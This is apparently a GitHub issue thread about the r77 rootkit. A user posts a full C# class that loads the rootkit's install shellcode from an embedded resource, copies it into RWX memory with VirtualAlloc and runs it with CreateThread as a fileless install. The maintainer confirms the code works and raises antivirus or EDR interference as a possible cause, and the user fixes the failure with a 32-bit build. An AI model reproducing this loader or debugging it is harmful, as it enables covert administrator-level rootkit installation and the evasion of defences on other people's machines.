(0xc0000005) 'Access violation'
Closed this issue · 2 comments
Followed steps perfectly to a T, built r77, built Install.shellcode, embedded as resource in C# program, but cannot for the life of me execute the shellcode no matter what I do. I've tried using a byte array, embedding resource, base64, VirtualAlloc; nothing fixes it.
```csharp
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Principal;

namespace Onimai.Shared.Helpers
{
    public class RootkitHelper
    {
        public void ExecuteShellcode()
        {
            // Check if the process has elevated privileges
            if (!IsProcessElevated())
            {
                Debug.WriteLine("This operation requires elevated privileges.");
                return;
            }

            // 1. Load Install.shellcode from resources
            byte[] shellCode;
            using (Stream stream = Assembly.GetExecutingAssembly().GetManifestResourceStream("Onimai.Shared.Resources.Install.shellcode"))
            {
                if (stream == null)
                {
                    Debug.WriteLine("Resource not found.");
                    return;
                }

                shellCode = new byte[stream.Length];
                stream.Read(shellCode, 0, shellCode.Length);
            }

            // 2. Create an RWX buffer with the shellcode.
            IntPtr buffer = VirtualAlloc(IntPtr.Zero, (IntPtr)shellCode.Length, 0x1000, 0x40);
            Marshal.Copy(shellCode, 0, buffer, shellCode.Length);

            // 3. Start the shellcode in a thread and wait until it terminated.
            IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
            WaitForSingleObject(thread, 0xffffffff);

            // This is the fileless equivalent to executing Install.exe.
        }

        private bool IsProcessElevated()
        {
            using (var identity = WindowsIdentity.GetCurrent())
            {
                var principal = new WindowsPrincipal(identity);
                return principal.IsInRole(WindowsBuiltInRole.Administrator);
            }
        }

        [DllImport("kernel32.dll")]
        private static extern IntPtr VirtualAlloc(IntPtr address, IntPtr size, int allocationType, int protect);

        [DllImport("kernel32.dll")]
        private static extern IntPtr CreateThread(IntPtr threadAttributes, uint stackSize, IntPtr startAddress, IntPtr parameter, uint creationFlags, out uint threadId);

        [DllImport("kernel32.dll")]
        private static extern uint WaitForSingleObject(IntPtr handle, uint milliseconds);
    }
}
```
The program '[31960] Onimai.exe' has exited with code 3221225477 (0xc0000005) 'Access violation'.
Install.exe works perfectly fine, but shellcode is broken. I've tried converting and everything.
Your code looks right, so I pasted it into my elevated VS instance and ran it; r77 got installed successfully.
We can start by excluding some common errors:
- Is your C# process really 32-bit?
- Any type of AV / EDR that's interrupting it?
- The shellcode that you compiled didn't work. Does the shellcode I offer for download work? (should be the same, though)
I actually figured out the issue: my VS instance was refusing to build as 32-bit for some reason. I got it to finally ACTUALLY build as 32-bit and it worked just fine. Thank you!